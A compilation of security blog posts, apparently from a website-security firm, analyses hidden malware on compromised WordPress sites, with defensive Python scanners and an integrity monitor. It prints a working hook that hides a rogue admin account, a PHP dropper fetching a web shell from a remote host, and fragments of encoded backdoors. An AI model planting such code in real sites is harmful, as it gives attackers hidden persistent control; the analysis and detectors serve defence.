Hiding malicious code from the user using white...

Over the years, attackers have used different techniques for hiding malicious files on websites: obfuscating code, altering legitimate functions to execute malware, modifying entire core files to carry out their malicious activity, and much more.


In this article, we’ll describe a simple way of hiding malware from inexperienced webmasters who use text editors that do not wrap long lines of code. Instead of injecting complex and obfuscated code, the attackers simply added whitespace at the beginning of the file. The snippet in question follows (please notice the scroll bar at the bottom):

At first glance, the file looked pretty normal. Upon further inspection, we noticed that the first row contained code pushed out of view behind 598 whitespace characters, with the following content:


$x8 = "\x63\x68\x72"; $E7 = "\x69\x6e\x74\x76\x61\x6c"; $Qb = $x8($E7("\x31\x30\x31")).$x8($E7($x8($E7("\x3….

In this particular case, the attacker hid a heavily encoded PHP backdoor in the file. Different attacks use this very same technique, such as SEO spam injections, credential and credit card stealers, and others.
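A small scanner for this trick, added here as an example (it is not code from the post or from Sucuri): it flags any line that hides content behind a long run of blanks and then decodes the `\xNN` escapes in that line's double-quoted literals, so that names like `chr` and `intval` become readable. The PHP sample and the 80-blank threshold are constructed assumptions; the post's case used 598 characters.

```python
import re

# Constructed sample, not the file from the post: the first line pushes PHP code
# out of view behind a long run of spaces (the post's case used 598; 120 here),
# and the string literals are hex-escaped so "chr" and "intval" never appear
# as plain text.
PADDED_PHP = (
    '<?php' + ' ' * 120
    + r'$x8 = "\x63\x68\x72"; $E7 = "\x69\x6e\x74\x76\x61\x6c"; $Qb = $x8($E7("\x31\x30\x31"));'
    + '\n'
    + 'define("WP_USE_THEMES", true);\n'
    + "require __DIR__ . '/wp-blog-header.php';\n"
)

HEX_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{2})')
# A double-quoted PHP literal, allowing escaped characters inside it.
DQ_STRING = re.compile(r'"((?:\\.|[^"\\])*)"')


def decode_hex_escapes(literal: str) -> str:
    """Resolve PHP \\xNN escapes so an obfuscated string reads as plain text."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), literal)


def find_padded_lines(source: str, min_pad: int = 80):
    """Return (line_no, pad_length, code) for every line that carries content
    after at least min_pad consecutive spaces or tabs."""
    pattern = re.compile(r'[ \t]{%d,}(\S.*)$' % min_pad)
    hits = []
    for no, line in enumerate(source.splitlines(), start=1):
        m = pattern.search(line)
        if m:
            hits.append((no, len(m.group(0)) - len(m.group(1)), m.group(1)))
    return hits


def reveal_strings(code: str):
    """Decode every double-quoted literal found in a code fragment."""
    return [decode_hex_escapes(s) for s in DQ_STRING.findall(code)]


def scan(source: str, min_pad: int = 80):
    """Combine both checks: padded lines plus the decoded literals they carry."""
    return [
        {"line": no, "padding": pad, "code": code, "strings": reveal_strings(code)}
        for no, pad, code in find_padded_lines(source, min_pad)
    ]


if __name__ == "__main__":
    for hit in scan(PADDED_PHP):
        print(f"line {hit['line']}: {hit['padding']} blanks hide: {hit['code'][:60]}...")
        print("  decoded literals:", hit["strings"])
```

Run it over a site's PHP files with a threshold tuned to the longest legitimate indentation you expect; the decoded literals are what make a hit worth a second look, since long-line padding alone also shows up in minified or generated code.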

If you suspect any malware activity on your website and at first glance you cannot find anything suspicious, we recommend checking for modified files. If you are not comfortable modifying files and the database yourself, you can rely on the Security Engineers at https://sucuri.net to clean and protect your website.

Hooking WordPress Class to Hide Malicious Users

When a website is compromised, attackers perform post-exploitation tasks to maintain access to the site for as long as possible. One of these actions is usually the creation of admin users to remotely control the site or automate the creation or distribution of spam content. Unfortunately (for them), these fake users are really easy to detect and remove, so attackers have to find and use new techniques to hide them. During an investigation, we found a small piece of code inside the file "/current_wp_theme/functions.php" that caught our attention:


<?php
add_action('pre_user_query', 'yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
    global $current_user;
    $username = $current_user->user_login;
    // Every account except the attacker's own gets the filtered query
    if ($username != 'admina') {
        global $wpdb;
        $user_search->query_where = str_replace('WHERE 1=1',
            "WHERE 1=1 AND {$wpdb->users}.user_login != 'admina'",
            $user_search->query_where);
    }
}

This code hooks the action “pre_user_query”. According to the official documentation, this action "Fires after the WP_User_Query has been parsed, and before the query is executed", which allows modifying the query built by the WordPress core class “WP_User_Query” on the fly.

In this case, the attacker uses the function "str_replace()" to replace the original WHERE clause of the user search query with his own, making the malicious admin user "admina" invisible in the WordPress admin area (backend):

str_replace('WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != 'admina'", $user_search->query_where)

If you see malicious posts on your site with an unknown author and you are not able to find the user to remove it, your site may be infected with similar code. Also, if you have a File Integrity Monitoring system in place, you should be able to detect such changes to the file system and take the appropriate actions to prevent or remediate the infection (remove or re-upload the file).
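A static check for this hiding technique, added as an example that is not code from the post or from WordPress: it finds every `pre_user_query` hook registration in a PHP source file, extracts the callback's body with simple brace matching, and reports the login the callback filters out of `query_where`. The `functions.php` sample is constructed to carry the same hook shape as the one above next to ordinary theme code.

```python
import re

# Constructed sample, not the file from the post: a theme functions.php with
# legitimate code followed by a hook that hides one login from user listings.
FUNCTIONS_PHP = r"""<?php
add_action('wp_enqueue_scripts', 'mytheme_assets');
function mytheme_assets() {
    wp_enqueue_style('mytheme', get_stylesheet_uri());
}
add_action('pre_user_query', 'yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
    global $current_user;
    if ($current_user->user_login != 'admina') {
        global $wpdb;
        $user_search->query_where = str_replace('WHERE 1=1',
            "WHERE 1=1 AND {$wpdb->users}.user_login != 'admina'", $user_search->query_where);
    }
}
"""

# add_action('pre_user_query', 'callback') -> capture the callback name
HOOK_RE = re.compile(
    r"""add_(?:action|filter)\s*\(\s*['"]pre_user_query['"]\s*,\s*['"](\w+)['"]""")
# user_login != 'name' / <> 'name' / NOT IN ('name') -> capture the login
EXCLUDE_RE = re.compile(
    r"""user_login\s*(?:!=|<>|NOT\s+IN)\s*\(?\s*['"]([^'"]+)['"]""", re.I)


def function_body(source: str, name: str) -> str:
    """Return the text of a named PHP function by matching braces.
    Naive on purpose: braces inside string literals are assumed balanced."""
    m = re.search(r'function\s+' + re.escape(name) + r'\s*\(', source)
    if not m:
        return ''
    start = source.find('{', m.end())
    depth = 0
    for i in range(start, len(source)):
        if source[i] == '{':
            depth += 1
        elif source[i] == '}':
            depth -= 1
            if depth == 0:
                return source[start:i + 1]
    return source[start:]


def find_hidden_users(source: str):
    """List (callback, [logins]) for pre_user_query hooks whose callback
    touches query_where and excludes specific user_login values."""
    findings = []
    for callback in HOOK_RE.findall(source):
        body = function_body(source, callback)
        if 'query_where' not in body:
            continue  # hook does something else, e.g. changes ordering
        logins = sorted(set(EXCLUDE_RE.findall(body)))
        if logins:
            findings.append((callback, logins))
    return findings


if __name__ == "__main__":
    for callback, logins in find_hidden_users(FUNCTIONS_PHP):
        print(f"{callback}() hides user(s) {logins} from WP_User_Query")
```

Because the hook only rewrites `WP_User_Query`, a direct query against the users table (for example `SELECT ID, user_login FROM wp_users`, with your table prefix) still lists the hidden account and is the quickest way to confirm a hit.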

Camouflage does not have to be advanced to...

Oftentimes a malware author will try to camouflage their malware’s code in an effort to hide its true intent from an unsuspecting eye. I recently came across an interesting example in a malicious file used to bypass authentication when accessing wp-admin:


If you aren’t familiar with the word “Softaculous”, it is a popular installer for common CMS and other scripts. If you have ever used a “one click install” tool like Fantastico de Luxe or QuickInstall/Mojo Marketplace, then it is similar to that.

I also want to mention that the filename was a random alphanumeric string, so it wasn’t possible to determine its legitimacy from the filename alone. For that reason, we needed to analyze the code and make our determination from there.

An unsuspecting person may view line 4 and see that it mentions Softaculous. If they have used Softaculous before, they may just take a quick glance at the rest of the file. Since Softaculous allows for automatic updates, and users update WordPress through wp-admin, doesn’t it seem reasonable that Softaculous may need to access wp-admin for updates and that’s the purpose of this file?

This is a great example of how the camouflage attempts to trick the user into thinking this is, or might be, just a normal file. Due to this doubt, some users won’t delete the file, leaving it intact (as I am sure many of us have accidentally deleted an important file and know how destructive that can be, especially if you don’t have any backups).

Ultimately the file was not legitimate and was determined to have been maliciously added. It’s what I would call a multi-layer backdoor, as the hacker could also create their own admin user once inside wp-admin so they wouldn’t have to rely on the file being there in the future (though a professional or security-experienced user should know to examine existing users).

If you need any help or have any questions, let us know. 🙂

Web shell downloader – simple attempt to avoid...

When dealing with compromised scenarios, our team has to be very thorough to remove all pieces of malware from the infected website. Most of the time attackers don’t inject a single bit of code but a variety of malware, to increase the chances of maintaining access to the compromised resource while reducing the chances of getting caught.


One of the techniques they use to increase those odds is injecting a file known as a dropper, which downloads the real malware onto the system. The dropper can go undetected for a long time because it usually contains no obfuscated functions, encoding, or anything malicious per se. Its sole purpose is to download the malware and write it onto the system, as you can see in the snippet below:

<?php
// Open (or create) the local file that will hold the downloaded web shell
if( $z = fopen( 'include4.php', 'w') ) {
    // Fetch the shell from the remote host and write it straight to disk
    if( fwrite( $z, file_get_contents( 'hxxp://picasa(dot)commie.msgftw(dot)com/priv8.php') ) ) {
        fclose( $z );
        echo '0'; // success
    } else {
        echo '1'; // download or write failed
    }
} else {
    echo '2'; // could not create the local file
}

If you are unfamiliar with PHP, don’t you worry, the snippet is pretty straightforward. The dropper tries to download the malware (web shell) using the function “file_get_contents()” and saves it into the file “include4.php”. If the operation succeeds, the number 0 is printed as the result of the request, the well-known exit code for successful command execution on UNIX systems. If it can’t download the web shell, it prints 1; if it can’t create the file in which the shell will reside, it prints 2.
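Since a dropper carries no obfuscation, signature scans keyed on `eval`/`base64_decode` miss it; what gives it away is the combination of a remote fetch, a write call and a `.php` destination in one short file. The scanner below, added here as an example and not code from the post or from Sucuri, scores exactly that combination. Both PHP samples are constructed, with `example.invalid` hosts standing in for the real URL.

```python
import os
import re

# Constructed samples, not the page's files. DROPPER mirrors the shape the post
# describes (remote fetch written straight into a .php file); BENIGN fetches a
# remote resource but never writes it to disk.
DROPPER = r"""<?php
if ($z = fopen('include4.php', 'w')) {
    if (fwrite($z, file_get_contents('http://example.invalid/priv8.php'))) {
        fclose($z); echo '0';
    } else { echo '1'; }
} else { echo '2'; }
"""

BENIGN = r"""<?php
$json = file_get_contents('https://api.example.invalid/status');
echo json_decode($json)->status;
"""

# A fetch whose first argument is a remote URL
REMOTE_FETCH = re.compile(
    r"""(?:file_get_contents|fopen|curl_init)\s*\(\s*['"](?:https?|ftp)://""", re.I)
# Any call that writes data to a file
WRITE_CALL = re.compile(r"""\b(?:fwrite|fputs|file_put_contents)\s*\(""", re.I)
# A local .php path being opened for writing or written directly
PHP_TARGET = re.compile(
    r"""\b(?:fopen|file_put_contents)\s*\(\s*['"][^'"]*\.php['"]""", re.I)


def classify(source: str) -> dict:
    """Score the dropper pattern. Each flag alone is common in legitimate
    code; all three together in one file is the shape worth acting on."""
    flags = {
        "remote_fetch": bool(REMOTE_FETCH.search(source)),
        "writes_file": bool(WRITE_CALL.search(source)),
        "php_target": bool(PHP_TARGET.search(source)),
    }
    likely = flags["remote_fetch"] and flags["writes_file"] and flags["php_target"]
    return {**flags, "likely_dropper": likely}


def scan_tree(root: str):
    """Walk a document root and return the .php files that score as droppers."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith('.php'):
                path = os.path.join(dirpath, name)
                with open(path, encoding='utf-8', errors='replace') as fh:
                    if classify(fh.read())["likely_dropper"]:
                        hits.append(path)
    return hits


if __name__ == "__main__":
    print("dropper sample:", classify(DROPPER))
    print("benign sample: ", classify(BENIGN))
```

Treat a hit as a starting point rather than a verdict: some installers legitimately fetch and write PHP, so check whether the file is part of a known package and whether the fetched host is one the site has any reason to talk to.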

The following code is the content of the web shell fetched by the dropper from the 'hxxp://picasa(dot)commie.msgftw(dot)com/priv8.php' link:

<?php
/*
::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: ::
:: bm.php ::
:: BoffMax v1.0 Web Shell by The-C0de Team ::
....
<? eval(gzinflate(str_rot13(base64_decode('FJ3HjuPaklJ/
...

To prevent these issues, we highly recommend having a File Integrity Monitoring system in place, as well as a Web Application Firewall to block attacks against your website. If you suspect you are infected or detect suspicious activity on your website, feel free to contact us at: https://sucuri.net
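File Integrity Monitoring is the control each section above falls back on, so here is the core of one in a few dozen lines, added as an example rather than Sucuri's product or any code from the posts: snapshot the SHA-256 of every file under a document root, store it, and later diff a fresh snapshot against it to list added, modified and removed files. The set of monitored extensions and the baseline file name are assumptions chosen for the example.

```python
import hashlib
import json
import os

# Assumed for the example: which files to track and where the baseline lives
MONITORED = ('.php', '.js', '.htaccess')
BASELINE_FILE = 'fim-baseline.json'


def digest_bytes(data: bytes) -> str:
    """SHA-256 of a byte string (kept separate so it can be tested directly)."""
    return hashlib.sha256(data).hexdigest()


def file_digest(path: str, chunk: int = 65536) -> str:
    """SHA-256 of a file, read in chunks so large files do not load at once."""
    h = hashlib.sha256()
    with open(path, 'rb') as fh:
        for block in iter(lambda: fh.read(chunk), b''):
            h.update(block)
    return h.hexdigest()


def build_baseline(root: str, extensions=MONITORED) -> dict:
    """Map each monitored file (path relative to root) to its digest."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(extensions):
                full = os.path.join(dirpath, name)
                baseline[os.path.relpath(full, root)] = file_digest(full)
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Diff two snapshots. A new .php file (a dropper, a padded backdoor) shows
    up as added; a hooked functions.php shows up as modified."""
    old, new = set(baseline), set(current)
    return {
        "added": sorted(new - old),
        "modified": sorted(p for p in old & new if baseline[p] != current[p]),
        "removed": sorted(old - new),
    }


def save_baseline(root: str, path: str = BASELINE_FILE) -> dict:
    snapshot = build_baseline(root)
    with open(path, 'w') as fh:
        json.dump(snapshot, fh, indent=1, sort_keys=True)
    return snapshot


def check(root: str, path: str = BASELINE_FILE) -> dict:
    with open(path) as fh:
        return compare(json.load(fh), build_baseline(root))


if __name__ == "__main__":
    import sys
    root = sys.argv[2] if len(sys.argv) > 2 else '.'
    if len(sys.argv) > 1 and sys.argv[1] == 'baseline':
        print(f"recorded {len(save_baseline(root))} files")
    else:
        print(json.dumps(check(root), indent=1))
```

Record the baseline right after a clean install or cleanup, keep it outside the web root (an attacker who can write `include4.php` can also edit a baseline stored beside it), and run the check from cron so a modified `functions.php` or an unexpected new file is reported rather than discovered by accident.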